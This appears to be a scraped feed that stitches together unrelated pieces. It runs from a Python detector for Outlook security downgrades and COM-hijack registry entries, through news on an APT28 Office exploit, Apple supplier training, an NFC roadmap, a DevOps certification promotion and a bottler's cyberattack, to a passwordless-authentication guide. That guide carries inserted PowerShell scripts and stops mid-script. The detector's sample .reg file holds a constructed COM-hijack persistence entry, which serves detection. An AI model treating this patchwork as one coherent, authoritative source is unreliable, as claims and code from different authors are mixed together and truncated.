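        m = CLSID_INPROC_RE.match(key)
        if m and isinstance(values.get("@"), str) and USER_WRITABLE_RE.match(values["@"]):
            findings.append(("com_hijack_candidate", m.group(1), values["@"], None))
    return findings


# Constructed .reg text (not a real export): two weakened Outlook settings, one
# per-user COM registration into the profile, and one benign vendor registration.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security]
"ObjectModelGuard"=dword:00000002
"PromptOOMSend"=dword:00000001
"PromptOOMAddressBookAccess"=dword:00000000

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\update.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{66666666-7777-8888-9999-000000000000}\InprocServer32]
@="C:\\Program Files\\Vendor\\vendor.dll"
"""

if __name__ == "__main__":
    for finding in hunt(parse_reg(SAMPLE_REG)):
        print(*finding)
```

The COM check only flags user-writable paths because legitimate per-user installs also register under HKCU; a match in the profile or %APPDATA% is still only a candidate until the DLL itself has been pulled and hashed against the published IOCs.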
Mitigation efforts
Zscaler recommended that organizations prioritize patching CVE-2026-21509, noting that APT28 exploited the flaw within days of Microsoft releasing fixes. Systems running unpatched versions of Microsoft Office remain exposed to weaponized RTF documents that require little user interaction beyond opening the file, which significantly raises the risk of compromise in email-driven attacks.
For defensive analysis, Zscaler published GitHub repositories containing artifacts from Operation Neusploit, including the Windows scheduled task configuration file and the MiniDoor macro code, illustrating the attack paths used. The disclosure also included a list of indicators of compromise (IOCs), covering file hashes, malicious domains, and URLs, to support detection efforts. CISA has added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, giving Federal Civilian Executive Branch (FCEB) agencies until February 16 to patch their systems.
Apple said the new Apple Education Hub in Bengaluru will serve as a centralized training and coordination facility for supplier employees in India, marking the company's first education hub of its kind in the country. The hub will begin offering courses in March and operates in collaboration with Manipal Academy of Higher Education, which will provide faculty and curriculum support focused initially on digital literacy and Swift programming.
In parallel with the Bengaluru hub, Apple is broadening its suite of development courses at more than 25 supplier facilities across the country. The updated curriculum will be introduced starting with Tata Electronics and is designed to cover digital literacy, Swift coding, robotics, automation technology, and smart manufacturing practices. Apple said these offerings are funded through its global $50 million Supplier Employee Development Fund, which supports education and skills training initiatives across the company's supply chain.
The company said the new courses build on an existing portfolio of more than 75 programs currently available to supplier employees in India. The offerings span technical skills, professional development, health education, and rights awareness training, which Apple says are designed to ensure workers are informed about workplace standards and protections. Apple works with international organizations and local partners to deliver these programs.
Apple's expanded training effort also includes plans to scale its robotics education program, which launched in India in December 2024. The initiative focuses on training factory educators in dedicated robotics labs, after which those educators adapt the material and conduct hands-on sessions within their own facilities. Apple said it plans to extend the robotics program to additional supplier sites in India later this year.
Apple also announced plans to grow its Vocational Education for Persons with Disabilities program in India. The program recently launched with Salcomp and seeks to provide employment and professional development opportunities for people with disabilities within Apple's supply chain, as well as improve safety, accessibility, and inclusivity practices at manufacturing facilities. To date, the program has supported more than 18,000 supplier employees around the world and builds on Apple's partnership with Enable India.
This article, "Apple Teaching Swift and Robotics Across Its India Supply Chain" first appeared on MacRumors.com
The NFC Forum is the global standards body for Near Field Communication technology. Apple is a board member of the organization. The latest multi-year Technology Roadmap identifies six development priorities that will shape future NFC standards.
One of the most significant changes outlined is work toward substantially faster NFC data rates, up to eight times higher than current levels. The roadmap also places emphasis on improving NFC reader mode interoperability through end-to-end application testing.
The roadmap continues to highlight multipurpose tap functionality, which would allow a single NFC tap to support multiple actions depending on context. The NFC Forum says this would enable readers to request specific credentials needed for a given action.
The NFC Forum said it is beginning work on next-generation NFC wireless charging specifications, with goals that include higher power levels and support for devices with multiple charging receivers. While NFC charging is currently limited to low-power accessory use, expanded standards could influence future devices.
Security enhancements are another major focus, with plans to publish the first NFC Controllers Security Profile, establishing baseline security requirements for NFC controller hardware. The roadmap also includes work on migrating NFC protocols to post-quantum cryptography, so that they remain secure against future quantum computers, and on strengthening protection against relay attacks, in which an attacker forwards the radio exchange between a legitimate phone or tag and a reader over a longer distance.
Digital keys remain an active area of development as well, with plans to explore new digital key experiences to support a wider range of industry requirements.
The NFC Forum last published a technology roadmap in 2023, with several goals delivered as part of NFC Release 15 in June 2025.
Last year, Apple expanded its use of NFC notably by rolling out Tap to Pay on iPhone in many new countries, allowing merchants to accept contactless payments directly on an iPhone without additional hardware using the device's NFC capabilities. At the same time, under the European Union's regulatory regime, Apple continued to open broader third-party access to the iPhone's NFC chip so that third-party developers can use NFC for contactless transactions, enabling Apple Pay competitors such as Curve and PayPal to offer NFC-based payment options on iOS in Europe.
This article, "New Roadmap Outlines What's Next for NFC on iPhone" first appeared on MacRumors.com
In this guide, we will discuss everything you need to know about the Certified DevOps Architect certification, the necessary skills, preparation plans, common mistakes, and how this can elevate your career.
What is a Certified DevOps Architect?
The Certified DevOps Architect (CDA) certification is designed for professionals who want to master the art of designing DevOps solutions that drive automation, scalability, and efficiency across development and operations. The certification focuses on leveraging cloud platforms, infrastructure as code (IaC), CI/CD pipelines, and security integration (DevSecOps) to build comprehensive DevOps architectures.
About the Certification
The Certified DevOps Architect is a high-level program that proves you have the skills to lead a company’s technical strategy. It is not just about learning one tool like Jenkins or Docker; it is about knowing how to connect 40 or 50 different tools into one smooth, safe system.
Deep Dive into the Certified DevOps Architect Certification
If you want to move into a leadership role or earn a higher salary in India or abroad, this is the track for you. Here is everything you need to know about this specific certification.
What it is
The Certified DevOps Architect (CDA) is an advanced credential. It focuses on large-scale systems, multi-cloud designs, and “Infrastructure as Code.” It proves you can design a system that stays available and recovers from failures, even when thousands of people are using it at once.
Who Should Take the Certified DevOps Architect Certification?
This certification is ideal for professionals who already have experience in DevOps practices and are looking to specialize in designing DevOps solutions for large-scale systems. Ideal candidates include:
DevOps Engineers looking to specialize in architectural design and complex system management.
Cloud Engineers who want to integrate DevOps practices with cloud infrastructure.
Platform Engineers interested in automation, CI/CD, and container orchestration.
Engineering Managers aiming to lead DevOps transformations and guide teams in scaling DevOps practices.
Skills you’ll gain
The Certified DevOps Architect certification equips you with the following skills:
Designing scalable, automated CI/CD pipelines for continuous integration and delivery.
Implementing infrastructure as code (IaC) with tools like Terraform, CloudFormation, and Ansible.
Building and managing cloud-native infrastructures using platforms like AWS, Azure, and Google Cloud.
Optimizing performance and securing infrastructure with DevSecOps practices.
Automating deployment and monitoring with tools like Kubernetes, Jenkins, Docker, and Prometheus.
Understanding cloud security integration to make DevOps practices secure and compliant.
Real-World Projects You Should Be Able to Do After It
After earning the Certified DevOps Architect certification, you will be able to work on several real-world projects, such as:
Designing and deploying CI/CD pipelines for large applications.
Automating cloud infrastructure provisioning with tools like Terraform and Ansible.
Building containerized applications using Docker and managing orchestration with Kubernetes.
Creating and implementing security policies throughout the DevOps pipeline using DevSecOps strategies.
Designing fault-tolerant, scalable, and secure cloud-native applications.
Optimizing infrastructure cost management using cloud cost management strategies (FinOps).
Preparation Plan
7–14 Days: Best for veterans. Review the core concepts of IaC, Kubernetes, and cloud security. Focus on the exam format.
30 Days: The standard path. Spend 1-2 hours a day going through the 46 tools covered in the program. Complete the hands-on labs.
60 Days: Best for those moving from a different field. Start with Linux and cloud basics before moving into architectural patterns.
Common Mistakes
Only learning the tools: Many people learn how to run a command but don’t understand the “why” behind it.
Ignoring the “culture”: DevOps is about people working together. An architect who ignores the team’s needs will fail.
Over-complicating: Sometimes the simplest solution is the best. Don’t use 10 tools when 2 will do.
Best Next Certifications After This
Once you complete your Certified DevOps Architect certification, consider pursuing the following certifications:
1. Same Track: Certified DevOps Professional (CDP) – This is the next level of certification focusing on advanced DevOps skills and expertise.
2. Cross-Track: Certified Kubernetes Administrator (CKA) – Specialize further in Kubernetes, the container orchestration tool used extensively in DevOps.
3. Leadership: Certified Cloud Security Professional (CCSP) – Focus on cloud security, which is critical for DevOps professionals working with cloud platforms.
Master Certification Comparison Table
To help you see where the Architect role fits, here is a comparison of the key certifications in the “Ops” world.
Track | Level | Who it’s for | Prerequisites | Skills Covered | Recommended Order
DevOps | Advanced | Senior Engineers | 5+ years Exp | IaC, CI/CD, Design | 1st (Core)
DevSecOps | Specialist | Security Leads | Basic DevOps | Vault, Falco, Scanning | 2nd (Special)
SRE | Specialist | Reliability Leads | Coding + Linux | SLOs, Error Budgets | 2nd (Scale)
MLOps | Specialist | ML Engineers | Python + DevOps | ML Pipelines, Data | 3rd (AI)
DataOps | Specialist | Data Engineers | SQL + Cloud | Data Pipelines, Git | 3rd (Data)
FinOps | Management | Managers/Architects | Cloud Basics | Cost Governance | 3rd (Business)
Choose Your Path: 6 Specialized Learning Paths
As a mentor, I tell my students that you cannot learn everything at once. You must pick a path that matches your career goal.
DevOps Path: This is the foundation. It focuses on the flow from code to production. You learn how to make things move fast and without errors.
DevSecOps Path: This is for those who love security. You learn how to put security checks into the automated pipeline so that hackers can’t find holes in your code.
SRE Path: This is about reliability. If you want to work for companies like Google or Netflix, you need to know how to keep systems running 99.99% of the time.
AIOps/MLOps Path: This is the newest path. It uses AI to manage IT systems and automates the life of machine learning models. It is the future of the industry.
DataOps Path: This path applies DevOps ideas to data. It ensures that the data used by big companies is clean, safe, and delivered fast to the people who need it.
FinOps Path: This path is about the money. You learn how to read cloud bills and design systems that use the least amount of money while giving the most value.
Role → Recommended Certifications Mapping
Depending on what your job title is today, here is what you should aim for:
DevOps Engineer: Aim for Certified DevOps Architect to move into senior leadership.
SRE: Go for Certified Site Reliability Architect to master large-scale reliability.
Platform Engineer: Focus on CKA (Kubernetes) followed by Certified DevOps Architect.
Cloud Engineer: Start with cloud-specific certs (AWS/Azure) and then take Certified DevOps Architect.
Security Engineer: Your best path is Certified DevSecOps Professional.
Data Engineer: Look into DataOps Certified Engineer (CDOE).
FinOps Practitioner: Take the Certified FinOps Professional to master cloud costs.
Engineering Manager: Take Certified DevOps Architect to speak the same language as your technical leads.
Top Institutions for Training & Certification
Finding the right place to learn is just as important as the certificate itself. Here are the top institutions that provide training for the Certified DevOps Architect (CDA):
DevOpsSchool: This is a global leader in the DevOps space. They are famous for their hands-on training and their focus on real-world projects. They provide a massive library of videos and live sessions led by experts like Rajesh Kumar.
Cotocus: This institution focuses heavily on corporate and specialized training. If you are looking for niche skills in specific cloud platforms or advanced containerization, Cotocus is a strong choice with a professional focus.
Scmgalaxy: A very technical platform that excels in “Source Code Management” and Build/Release engineering. They are great for those who want to understand the deep mechanics of how code turns into a finished product.
BestDevOps: They specialize in making complex topics simple. Their courses are designed around practical scenarios that you will actually face in a real job, making them a favorite for career changers.
devsecopsschool: As the name suggests, this is the place for security-first DevOps. They offer specialized programs that teach you how to integrate security into every single step of the software lifecycle.
sreschool: This portal is dedicated entirely to Site Reliability Engineering. They focus on the high-end scalability and uptime skills required by the world’s biggest tech companies.
aiopsschool: If you want to enter the world of AI-driven operations, this is your home. They provide the most up-to-date training on using machine learning to improve IT performance.
dataopsschool: They bridge the gap between data science and operations. This institution is perfect for data engineers who want to adopt the speed and reliability of DevOps.
finopsschool: This school is all about the business side of the cloud. They teach engineers and managers how to control costs and ensure that cloud spending is helping the business grow.
Next Certifications to Take
Once you have completed your Architect certification, you should not stop. Based on data from experts at Gurukul Galaxy, here are your three best options for your next move:
Same Track (The Expert Move): Master in DevOps Engineering (MDE). This is the highest level of training available. It covers everything from the basics to the most advanced architecture patterns.
Cross-Track (The Multi-Skilled Move): Certified DevSecOps Professional. In today’s world, an architect who doesn’t understand security is at a disadvantage. Adding this will make you a “Security-Aware Architect.”
Leadership (The Management Move): Certified DevOps Manager (CDM). If you want to stop being “hands-on” and start leading entire departments, this certification focuses on the people, budget, and strategy side of DevOps.
FAQs (Frequently Asked Questions)
General Career FAQs
Q1: How difficult are these certifications?
Most are intermediate to advanced. They are not meant for beginners who have never seen a line of code. They require study and, most importantly, hands-on practice.
Q2: How much time should I spend on preparation?
If you are working full-time, I recommend 30 to 60 days. This allows you to spend an hour each day without burning out.
Q3: What are the prerequisites?
For the Architect level, we recommend at least 3 years of experience in IT. You should understand the basics of Linux and how the web works.
Q4: In what sequence should I take them?
Start with a “Professional” or “Engineer” level certification. Once you feel comfortable, move to the “Architect” level. After that, pick a specialty like Security or SRE.
Q5: What is the real value of these certificates?
They act as a “filter” for HR and hiring managers. When a company sees “Certified DevOps Architect,” they know you have been vetted by experts and have completed real projects.
Q6: Will this help me get a job in India?
Yes. India has a massive demand for senior DevOps talent. Companies in Bangalore, Pune, and Gurgaon are constantly looking for architects to lead their cloud transformations.
Q7: Can I take these exams online?
Yes, most of these programs, especially those from DevOpsSchool, are fully online. You can take the training and the exam from your home.
Q8: What kind of career outcomes can I expect?
Most students move into roles like Lead DevOps Engineer, Platform Architect, or Technical Manager. Salaries for these roles are among the highest in the IT industry.
Q9: Do I need to be a pro at coding?
You don’t need to be a developer, but you must be comfortable with scripting (like Python or Bash) and reading code. DevOps is about “software defining” the infrastructure.
Q10: Is there a lot of math involved?
No. This is about logic, system design, and understanding how data flows. You don’t need advanced math.
Q11: Are these certifications recognized globally?
Yes. DevOpsSchool and its partners are recognized by MNCs around the world. The skills you learn are universal.
Q12: What if the tools change next year?
Tools like Jenkins or Docker might change, but the “Architectural Patterns” you learn—like CI/CD, IaC, and Observability—will stay the same for a long time.
FAQs on Certified DevOps Architect
Q1: What exactly does the CDA exam test?
It tests your ability to design a full ecosystem. You will be asked how to solve problems like slow deployments, security risks, and high cloud costs.
Q2: How long is the CDA exam?
The exam is usually 3 hours long. It is an online proctored test, meaning someone will watch you through your webcam to ensure fairness.
Q3: Are there any labs in the exam?
The exam focuses on multiple-choice questions that test your “situational judgment.” However, the training program includes many labs that prepare you for these questions.
Q4: What is the passing score?
Typically, you need to score 70% or higher to pass.
Q5: Can I retake the exam if I fail?
Yes. Most providers offer at least one retake, but you should check the specific policy on the DevOpsSchool website.
Q6: Does the certification expire?
Most professional certifications are valid for 2 to 3 years. This is because technology moves fast, and you need to show that your skills are still fresh.
Q7: How does this help with “Multi-Cloud”?
A major part of the CDA is learning how to design systems that work on AWS, Azure, and Google Cloud at the same time so you are not locked into one provider.
Q8: Is the CDA better than cloud-specific certs?
Cloud certs (like AWS Architect) are great for that one platform. The CDA is better for understanding the entire process of software delivery across any platform.
The beverage bottler Romina, based in Reutlingen-Rommelsbach, was recently hit by a cyberattack. As the company explains on its website, it can therefore be reached neither by telephone nor by e-mail. According to a report in the Reutlinger General-Anzeiger, production is currently at a standstill as well.
No further details about the incident are available so far, so it is unclear exactly how the attack unfolded. It is also not known whether data was stolen. According to the regional newspaper Südwest Presse, the Reutlingen police are already investigating the case.
Romina Mineralbrunnen employs 130 people according to its own figures. In 2024 the company recorded 180.7 million fillings and generated revenue of more than 40 million euros.
Most organizations I’ve worked with start this journey with romantic notions of flipping a switch and sailing into a passwordless future. What they discover instead is that achieving true passwordless authentication requires rethinking identity architecture from the ground up. It’s not about swapping one authentication method for another — it’s about fundamentally restructuring how you verify identity across every layer of your infrastructure. The transition demands careful planning, technical rigor and unwavering commitment to security principles over convenience.
Prerequisites: Building the foundation before the migration
Before we can talk about passwordless authentication, we need to address what I call the “prerequisite triangle”: cloud Kerberos trust, device registration and Conditional Access policies. Skip any one of these, and your migration will stall before it gains momentum.
Cloud Kerberos trust is the unsung hero of hybrid passwordless deployments. When I started working on my first full migration, I underestimated how critical this piece was. Traditional Kerberos assumes a managed network with domain controllers you control. With cloud Kerberos trust (Microsoft Entra Kerberos), Entra ID is represented in your on-premises Active Directory by a read-only domain controller object named AzureADKerberos, and Entra ID issues the signed-in device a partial Kerberos ticket-granting ticket for that domain; the device then presents the partial TGT to a real on-premises domain controller and exchanges it for a full TGT. No domain controller has to be exposed to the internet. This is your bridge between on-premises and cloud identity, and it is non-negotiable for seamless hybrid authentication. The mechanics of Kerberos itself have not changed significantly since its introduction in the 1980s, but extending it to cloud environments required a fundamental rethinking of how authentication tickets are issued and validated across trust boundaries.
Getting cloud Kerberos trust working requires your users to be synchronized from on-premises Active Directory to Entra ID, with password hash synchronization enabled even if you are not using it for authentication. Entra Connect (formerly Azure AD Connect, now on the 2.x release line) and the lighter Entra Cloud Sync agent are two different synchronization tools, so use one or the other for a given population of users. You then create the Entra Kerberos server object in each domain with the AzureADHybridAuthenticationManagement PowerShell module (Set-AzureADKerberosServer), and your domain controllers must run Windows Server 2016 or later. Your hybrid-joined devices need to be running Windows 10 21H2 or Windows 11 21H2 or later with the February 2022 cumulative update that introduced cloud Kerberos trust, and they must have reliable network connectivity to both your on-premises domain controllers and Entra ID. In one deployment, my team spent two weeks troubleshooting authentication failures before discovering that a firewall rule was blocking Kerberos traffic on TCP and UDP port 88. This single finding reinforced why network validation should occur before pilot rollout, not during.
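One way to turn the prerequisites above into a repeatable pre-pilot check, as an added example that is not part of the original article: a PowerShell script that verifies the client build, the hybrid join state, the Entra Kerberos server object in both directories, the domain controller version and port 88 reachability. It assumes the RSAT ActiveDirectory and AzureADHybridAuthenticationManagement modules are installed, that it runs as a domain admin who can also sign in as a Global Administrator, and that the domain name and admin UPN are placeholders for your environment. The line format checked in the klist step is taken from Microsoft's troubleshooting guidance and is treated as an assumption.

```powershell
# Added example (not from the article): pre-pilot checks for cloud Kerberos trust.
# Assumptions: run on a hybrid-joined Windows admin workstation as a domain admin;
# RSAT ActiveDirectory and AzureADHybridAuthenticationManagement modules installed;
# $Domain and $AdminUpn are placeholders for your environment.
param(
    [string]$Domain   = 'corp.example.com',                # placeholder AD domain
    [string]$AdminUpn = 'admin@example.onmicrosoft.com'    # placeholder Entra admin UPN
)
Import-Module ActiveDirectory
Import-Module AzureADHybridAuthenticationManagement

$checks = [ordered]@{}

# 1. Client build: cloud Kerberos trust arrived with the February 2022 updates for
#    Windows 10 21H2 (build 19044) and Windows 11 21H2 (build 22000).
$build = [int](Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').CurrentBuildNumber
$checks['Client build >= 19044'] = ($build -ge 19044)

# 2. Join state: a hybrid-joined device reports both AzureAdJoined and DomainJoined as YES.
#    An Entra registered device (WorkplaceJoined only) does not qualify.
$dsreg = dsregcmd /status
$checks['Hybrid joined'] = [bool]($dsreg -match 'AzureAdJoined\s*:\s*YES') -and
                           [bool]($dsreg -match 'DomainJoined\s*:\s*YES')

# 3. Domain controllers: Windows Server 2016 or later, and Kerberos (port 88) reachable.
#    This is the firewall lesson from the text, checked before the pilot instead of during it.
$dcs = Get-ADDomainController -Filter * -Server $Domain
foreach ($dc in $dcs) {
    $year = if ($dc.OperatingSystem -match 'Windows Server (\d{4})') { [int]$Matches[1] } else { 0 }
    $checks["DC $($dc.HostName) OS >= 2016"] = ($year -ge 2016)
    $tcp = Test-NetConnection -ComputerName $dc.HostName -Port 88 -WarningAction SilentlyContinue
    $checks["DC $($dc.HostName) TCP 88 reachable"] = $tcp.TcpTestSucceeded
}

# 4. Entra Kerberos server object: present in AD and in Entra ID, with matching key versions.
#    Get-AzureADKerberosServer prompts for the cloud admin sign-in; the domain credential is passed in.
$domainCred = Get-Credential -Message "Domain admin for $Domain"
$krb = Get-AzureADKerberosServer -Domain $Domain -UserPrincipalName $AdminUpn -DomainCredential $domainCred
$checks['AzureADKerberos object in AD']    = [bool]$krb.Id
$checks['AzureADKerberos object in Entra'] = [bool]$krb.CloudId
$checks['Kerberos key versions match']     = ($krb.KeyVersion -eq $krb.CloudKeyVersion)

# 5. Informational: after a Windows Hello sign-in the user should hold a cloud TGT.
#    The 'Cloud TGT' line format is an assumption taken from Microsoft's troubleshooting docs.
$checks['Cloud TGT present (after WHfB sign-in)'] = [bool]((klist cloud_debug) -match 'Cloud TGT\s*:\s*1')

# Report, then fail the run if any hard prerequisite is missing.
$checks.GetEnumerator() | ForEach-Object { '{0,-50} {1}' -f $_.Key, $_.Value }
$failed = $checks.GetEnumerator() | Where-Object { -not $_.Value -and $_.Key -notlike 'Cloud TGT*' }
if ($failed) { Write-Error "Prerequisite checks failed: $($failed.Key -join ', ')"; exit 1 }
```

Run it once from an admin workstation for the directory-level checks, then again on a handful of candidate pilot devices for the build, join-state and connectivity checks; the cloud TGT line only turns true on a device whose current user signed in with Windows Hello.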
Device registration and management come next. Every device attempting passwordless authentication must be either Entra joined or hybrid joined; an Entra registered (workplace-joined) device is not sufficient for Windows Hello for Business with cloud Kerberos trust. I’ve found that hybrid-joined devices work best in truly hybrid environments because they maintain connection to on-premises infrastructure while gaining cloud identity benefits. Your Intune Mobile Device Management deployment becomes critical here: devices must be compliant with your policies before they’re trusted for passwordless sign-in. This means ensuring that disk encryption is enabled, that antivirus is running and that devices meet your organization’s baseline security posture. The compliance baseline isn’t punitive; it’s the minimum acceptable security threshold.
Conditional Access policies form the final leg of the prerequisite triangle. These aren’t optional: they’re how you enforce the “never trust, always verify” principle of Zero Trust. NIST Special Publication 800-207 defines Zero Trust architecture as requiring continuous verification and explicit, per-request access decisions based on all available data points. I configure policies that require device compliance, enforce multi-factor authentication for sensitive operations, and block legacy authentication entirely (legacy protocols cannot carry a Windows Hello or FIDO2 assertion, so any you leave open become a password-only side door around the passwordless requirement). The policy I typically recommend as a starting point requires hybrid-joined devices, compliant Intune status and MFA for all access to on-premises resources, while allowing seamless sign-in for fully compliant devices. This creates a virtuous cycle where security and user experience reinforce each other.
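The starting-point policies described above, created in report-only mode with Microsoft Graph PowerShell, as an added example that is not part of the original article. It assumes the Microsoft.Graph modules are installed, that the caller can consent to the Policy.ReadWrite.ConditionalAccess, Policy.Read.All and Group.Read.All scopes, and that the group names 'Passwordless-Pilot' and 'BreakGlass-Accounts' are placeholders for groups that already exist in your tenant.

```powershell
# Added example (not from the article): pilot Conditional Access policies, report-only.
# Assumptions: Microsoft.Graph modules installed; the group display names below are
# placeholders for your tenant; policies start in report-only mode and are enabled later.
Connect-MgGraph -Scopes 'Policy.ReadWrite.ConditionalAccess', 'Policy.Read.All', 'Group.Read.All' -NoWelcome

$pilot      = Get-MgGroup -Filter "displayName eq 'Passwordless-Pilot'"
$breakGlass = Get-MgGroup -Filter "displayName eq 'BreakGlass-Accounts'"
if (-not $pilot -or -not $breakGlass) { throw 'Pilot or break-glass group not found; create them first.' }

# Built-in authentication strength that accepts only passwordless methods
# (Windows Hello for Business, FIDO2 security keys, Authenticator phone sign-in).
$pwless = Get-MgPolicyAuthenticationStrengthPolicy | Where-Object DisplayName -eq 'Passwordless MFA'
if (-not $pwless) { throw "Built-in 'Passwordless MFA' authentication strength not found." }

# Policy 1: pilot users must come from a hybrid-joined, Intune-compliant device AND
# satisfy the passwordless strength. operator 'AND' means every listed control is required.
$requirePasswordless = @{
    displayName = 'PW-Pilot 01: compliant hybrid device + passwordless MFA'
    state       = 'enabledForReportingButNotEnforced'   # switch to 'enabled' after the pilot
    conditions  = @{
        users          = @{ includeGroups = @($pilot.Id); excludeGroups = @($breakGlass.Id) }
        applications   = @{ includeApplications = @('All') }
        clientAppTypes = @('browser', 'mobileAppsAndDesktopClients')
    }
    grantControls = @{
        operator               = 'AND'
        builtInControls        = @('compliantDevice', 'domainJoinedDevice')  # domainJoinedDevice = hybrid joined
        authenticationStrength = @{ id = $pwless.Id }
    }
}

# Policy 2: block legacy authentication for everyone except break-glass accounts.
# Legacy protocols cannot carry a Windows Hello or FIDO2 assertion, so leaving them
# open would let a stolen password bypass policy 1 entirely.
$blockLegacy = @{
    displayName = 'PW-Pilot 02: block legacy authentication'
    state       = 'enabledForReportingButNotEnforced'
    conditions  = @{
        users          = @{ includeUsers = @('All'); excludeGroups = @($breakGlass.Id) }
        applications   = @{ includeApplications = @('All') }
        clientAppTypes = @('exchangeActiveSync', 'other')
    }
    grantControls = @{ operator = 'OR'; builtInControls = @('block') }
}

foreach ($body in @($requirePasswordless, $blockLegacy)) {
    $p = New-MgIdentityConditionalAccessPolicy -BodyParameter $body
    '{0,-60} {1}  state={2}' -f $p.DisplayName, $p.Id, $p.State
}
```

Leave both policies in report-only mode for the pilot window and review the sign-in logs' report-only results before flipping the state to enabled; the break-glass exclusion is what keeps a misconfigured policy from locking the tenant's administrators out.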
Architecture decisions: Hybrid authentication flows and Windows Hello for Business
Once your prerequisites are in place, you face critical architectural decisions that will shape your deployment for years to come. The primary decision point is whether to use Windows Hello for Business, FIDO2 security keys or phone sign-in as your primary authentication mechanism.
In my experience, Windows Hello for Business is the foundation for hybrid environments. It leverages biometric or PIN authentication on the device itself, so credentials are never transmitted across the network. When a user signs in with Windows Hello, they are not sending a password or any reusable credential: the biometric or PIN unlocks a private key stored in the device’s Trusted Platform Module (TPM), and that key signs a challenge from the identity provider to prove possession. For hybrid-joined devices this works seamlessly: the sign-in authenticates to Entra ID with the Windows Hello key, and the partial Kerberos ticket returned with the Primary Refresh Token is exchanged with your on-premises domain controller through cloud Kerberos trust, so the user experiences a single sign-in that covers both directories. This eliminates the attack surface that traditional password-based authentication creates. Organizations seeking more information on passwordless authentication approaches can review guidance from the Cybersecurity and Infrastructure Security Agency, which has published extensive recommendations on moving beyond passwords.
However, and this is crucial, not all devices have TPM 2.0, which is required for the most secure implementations. In one organization where we deployed to 15,000 devices, we discovered that 12% didn’t meet hardware requirements. We ended up implementing a phased approach: Windows Hello for Business on compliant devices, with FIDO2 security keys as the backup for devices that couldn’t support it. FIDO2 security keys, built on the FIDO Alliance’s open FIDO2 (CTAP2 and WebAuthn) standards, are also your answer for scenarios where you need physical authentication tokens, particularly for privileged accounts or high-risk scenarios. They resist phishing and account takeover because the credential is bound to the origin that registered it and the private key never leaves the token, so possession of the physical key is required for every sign-in. Research from the Identity Defined Security Alliance has shown that organizations using FIDO2-compliant authenticators reduce account compromise incidents by over 90% compared to password-dependent systems.
The architectural decision also includes determining how you handle legacy applications that still require passwords. Your options are limited: implement a passwordless-compatible application gateway, deprecate the application entirely or use Entra ID’s smart lockout and password protection features to reduce risk while you transition. I typically recommend treating legacy application support as a temporary bridge, not a permanent architecture. Organizations that treat this as permanent inevitably find themselves maintaining password infrastructure indefinitely, undermining the entire security posture you’re building.
Migration workflows: The step-by-step reality
The migration itself needs to follow a structured approach that I’ve refined across multiple organizations. Start with a pilot group — I recommend between 50 and 200 users who are willing to accept some friction in exchange for security improvements. This group should include IT staff and security-conscious users who can provide meaningful feedback without becoming frustrated with early-stage issues.
For the pilot phase, configure Windows Hello for Business using Group Policy for domain-joined devices and Intune policies for cloud-managed devices. In Entra ID, enable the passwordless methods you intend to allow in the authentication methods policy and use a Conditional Access authentication strength (the built-in Passwordless MFA strength is a sensible starting point) to require them for the pilot group. During this phase, maintain traditional password authentication as a fallback, not because you lack confidence, but because user trust in the system matters. I typically see a three to four week period where you’re supporting both methods while users adapt. This period provides invaluable data about real-world usage patterns and edge cases.
The second phase involves expanding to department-level groups. At this point, you should have identified and documented all the troubleshooting patterns that emerged in your pilot. Common issues I’ve encountered include PIN complexity policies that conflict with Windows Hello configuration, credential caching issues on hybrid-joined devices and confusion around how to recover access when a device is lost or compromised. A well-designed help desk knowledge base at this stage prevents the third phase from becoming a support crisis.
The final phase is organization-wide rollout with password authentication disabled. This is where you must have complete confidence in your fallback mechanisms and your support team’s ability to handle edge cases. I recommend maintaining password authentication for break-glass scenarios (though heavily restricted and logged) for at least 90 days after full rollout. This safety net provides psychological comfort to leadership and creates a genuine escape hatch if something unexpected occurs at scale.
Troubleshooting patterns and lessons learned
After guiding three large-scale deployments, I’ve compiled a list of issues that deserve attention before they become production problems.
Device compliance checking often becomes a bottleneck. If your Intune policies are too strict, you’ll have users locked out of passwordless authentication because their devices are non-compliant. The solution isn’t to loosen policies — it’s to automate compliance remediation. Use Intune’s remediation scripts to automatically enable required features and update settings rather than blocking access. When a device becomes non-compliant due to a missing security update, remediation scripts can deploy that update silently, restoring access without support interaction.
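An Intune remediation pair for the disk encryption requirement, as an added example that is not part of the original article. The text's example is a missing security update; this block applies the same mechanism to BitLocker on the OS drive, which is one of the compliance settings named earlier. Intune runs the detection script first; an exit code of 1 triggers the remediation script, 0 means compliant. The two halves are meant to be deployed as separate .ps1 files (the file names are placeholders) running as SYSTEM in 64-bit PowerShell; it assumes Windows 10/11 with a ready TPM, and an Entra joined or hybrid joined device so that the recovery key can be escrowed to Entra ID.

```powershell
# Added example (not from the article): Intune remediation pair for OS-drive BitLocker.
# Assumptions: Windows 10/11, ready TPM, device Entra joined or hybrid joined; deploy the
# two sections below as separate scripts (placeholder names), run as SYSTEM, 64-bit.

# ---------- Detect-OsDriveBitLocker.ps1 (exit 1 = remediate, exit 0 = compliant) ----------
$vol      = Get-BitLockerVolume -MountPoint $env:SystemDrive
$escrowed = $vol.KeyProtector | Where-Object KeyProtectorType -eq 'RecoveryPassword'
# Compliant once protection is on, encryption has at least started, and a recovery
# password protector exists (so the key can be escrowed and the disk recovered).
if ($vol.ProtectionStatus -eq 'On' -and $vol.VolumeStatus -ne 'FullyDecrypted' -and $escrowed) {
    Write-Output "Compliant: $($vol.VolumeStatus), protection on, recovery protector present"
    exit 0
}
Write-Output "Non-compliant: status=$($vol.VolumeStatus) protection=$($vol.ProtectionStatus)"
exit 1

# ---------- Remediate-OsDriveBitLocker.ps1 ----------
$tpm = Get-Tpm
if (-not ($tpm.TpmPresent -and $tpm.TpmReady)) {
    # No silent path without a ready TPM: report it so the device surfaces for manual handling.
    Write-Output 'Remediation skipped: no ready TPM'
    exit 1
}
$mp  = $env:SystemDrive
$vol = Get-BitLockerVolume -MountPoint $mp

# Always have a recovery password protector and escrow it to Entra ID before
# encrypting, so a TPM or firmware change never leaves the disk unrecoverable.
if (-not ($vol.KeyProtector | Where-Object KeyProtectorType -eq 'RecoveryPassword')) {
    Add-BitLockerKeyProtector -MountPoint $mp -RecoveryPasswordProtector | Out-Null
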